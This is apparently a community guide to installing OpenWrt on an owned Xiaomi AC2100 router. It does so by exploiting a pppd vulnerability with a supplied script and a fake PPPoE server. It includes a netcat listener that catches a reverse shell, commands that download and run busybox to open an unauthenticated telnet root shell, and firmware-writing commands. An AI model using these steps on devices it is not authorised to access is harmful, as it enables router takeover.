AC2100 OpenWrt Guide

Contents

• Acknowledgements and resources
• Migrating from old image
• Intro and Setup
  • Disclaimer
  • Requirements
• Installing packages (macOS)
• Installing packages (Ubuntu)
• Installing OpenWRT
  • 1. Download files
  • 2. Reset your router
  • 3. Insert LAN cables
  • 4. Setup TCP/IP
  • 5. Determining your network interface
  • 6. PPPoE simulator
  • 7. Running the exploit
  • 8. Post-install
• Miscellaneous
  • Flash Commands
  • Prebuilt images by @scp07
  • Translations

Acknowledgements and resources

This guide is based on the video of 韩风 Talk. Since many people don't know any Mandarin or don't use Windows, I've decided to write down my method of getting this to work. This is also helping people to understand more about the process rather than using a one-click solution.

pppoe-simulator.py by Percy233

pppd-cve.py by namidairo

Migrating from old image

You can skip reading this when you didn't flash with the old guide.

In case you used the Chinese Redmi image you can use the sysupgrade package provided in this repo. Since the R2100 (Black Cylinder) now is uniquely identified you will need to force the system upgrade.

Use any tool of your choice to transfer the sysupgrade.bin to the /tmp directory of your router

sysupgrade -v -F -n /tmp/xiaomi-router-sysupgrade.bin

Intro and Setup

If you find any mistakes in this guide, please submit a PR 👍🏻.

Disclaimer:

You can potentially brick your device. I don't take responsibility for any damage caused.

Requirements

1. A computer with an ethernet adapter
2. Two LAN cables
3. python3, scapy, netcat
4. Files from this repo
   • busybox
   • pppoe-simulator.py
   • pppd-cve.py
   • xiaomi-router-kernel1.bin
   • xiaomi-router-rootfs0.bin

Install instructions are available for macOS and Ubuntu. In case you use Windows or an other Linux distribution, I assume you are smart enough to install the required packages yourself.

Please note that python3 is aliased to python3 on macOS and Ubuntu (and in some other GNU/Linux distributions). Replace python3 and pip3 with python and pip on Windows - GNU/Linux accordingly.

Installing packages (macOS)

Before we start, please check your python version with:

python3 --version

Version 2 will not work.

In case you don't have a version of Python installed (or you have the version 2) go to https://brew.sh/ and run the installation script in your terminal, then proceed to install the required packages:

brew install python3 netcat

Install scapy for python:

pip3 install scapy

Installing packages (Ubuntu)

Thanks to @albertodlc for the instructions.

Before we start, please open a terminal (ctrl + t) and check your python version with:

python3 --version

Version 2 will not work.

In case you don't have a version of Python installed (or you have the version 2), proceed to install the required packages with:

sudo apt update
sudo apt install python3
sudo apt install python3-pip

And also check if you have all the network packages and dependencies:

ifconfig

If it shows an error, run the following command:

sudo apt install net-tools

Then install scapy and netcat for python:

(Don't forget the sudo in the first command)

sudo apt install python3-scapy
pip3 install netcat

Installing OpenWRT

1. Download files

• Clone the repo or download as .zip
• Make a folder with the following files and cd into it

Feel free to use your own images if you know what you are doing. For the case you are using the images in this repo, please ensure the provided .bin files have the correct sha256sum:

sha256sum *bin
63dba28c89e3df484419aa9079c4fc80ef183f1dcc4591d9935c25fde65f49e4  xiaomi-router-initramfs-kernel.bin
deb8b1b0c5b9c0ada4f944382ba935c9e1c132faea88818f19790564b3e74fde  xiaomi-router-kernel1.bin
4b7d9766d8f5454a5733fbb0ad15eee6bf92e18cdbe6a043f755e3812ba21718  xiaomi-router-rootfs0.bin
c7ee444c818097c67aca16aafdb3e983f3716d05256367e0244db8fc3a0d36b4  xiaomi-router-sysupgrade.bin

2. Reset your router

• Plug in your AC2100
• Wait for the system light to turn blue
• Hold the reset button until the light turns yellow
• Plug out your router

3. Insert LAN cables

• Bridge WAN and Port 1 (blue) with your first LAN cable
• Connect the second LAN cable to Port 2 and your computer (yellow)

4. Setup TCP/IP

• Go to your network settings
• Set the following for IPv4

• Plug in your router
• Wait for the indicator LED to turn blue

You should now be able to ping the router at 192.168.31.1.

5. Determining your network interface

• Run ifconfig
• Check for an interface with configured address 192.168.31.177 (see image below)
• Change the name of your interface in ppd-cve.py and pppoe-simulator.py (in my case it was en7)

# Line 5 of both script files
interface = "yourinterface"

• Check the MAC address from pppd-cve.py and adjust it accordingly to your device (you can check it in the bottom of the router).

# pppd-cve.py#L17
if src.startswith("your:router:mac")

6. PPPoE simulator

• Open up http://192.168.31.1 in your browser
• If there is a terms and conditions screen, click on 马上体验
• Click on 继续配置 (see image)

Start the pppoe-simulator:

python3 pppoe-simulator.py

You may need to run this as root for scapy to function properly. The script should show Waiting for packets.

Click on the field that says PPPOE.

Enter credentials (anything should be fine). I just use 123 for both. After that click on 下一步.

Requests should now appear in your PPPoE terminal window:

Also your web browser should now display this instead of a loading spinner:

7. Running the exploit

Open up two new terminal sessions.

Start an HTTP server where we can wget the files from later. Make sure to be in the folder that contains the repo files.

python3 -m http.server 80

Start the netcat network utility.

netcat -nvlp 31337

Run pppd-cve.py in a new terminal session:

python3 pppd-cve.py

When the packet has been sent successfully, you should be able to see a connection from 192.168.31.1:63627 in your netcat session.

This connection can be unstable and you may need to rerun netcat and pppd-cve.py if it drops.

If you do the following commands quickly, there should be no issues:

cd /tmp
wget http://192.168.31.177/busybox
chmod a+x ./busybox
./busybox telnetd -l /bin/sh

We should now have telnet access (you can find all commands in commands.txt):

telnet 192.168.31.1

Use wget to pull our files from the http server on the router:

wget http://192.168.31.177/xiaomi-router-rootfs0.bin
wget http://192.168.31.177/xiaomi-router-kernel1.bin&&nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit

Observation: Files are being requested in your http server session:

All what is left now is to write our images:

mtd write xiaomi-router-kernel1.bin kernel1
mtd -r write xiaomi-router-rootfs0.bin rootfs0

Your device should now reboot. First the LED blinks yellow for a couple of seconds before turning blue. When it turns blue again, you now have successfully set up OpenWrt. Congratulations!

What you can do now:

• Close all terminal sessions
• Revert your TCP/IP settings
• Remove the bridge cable
• Connect the router to the internet again

8. Post-install

Connect to your device via ssh

username: root
password: password

The router IP should be visible in your network settings (in my case http://192.168.1.1). LuCI web-interface is configured with HTTPS on this image. To use HTTPS you need to take additional steps to trust the certificate on your machine. If you want to just bypass the HTTPS errors you will need to use Firefox and add an exception.

ssh root@routerip

Miscellaneous

Flash commands

Partition names if you are already on OpenWRT:

mtd write xiaomi-router-kernel1.bin kernel
mtd write xiaomi-router-rootfs0.bin ubi

Partition names if you are on stock firmware:

mtd write xiaomi-router-kernel1.bin kernel1
mtd -r write xiaomi-router-rootfs0.bin rootfs0

Prebuilt images by @scp07

Also includes stock recovery image.

• Google Drive

Translations

• 中文 （视频）
• Spanish (Video)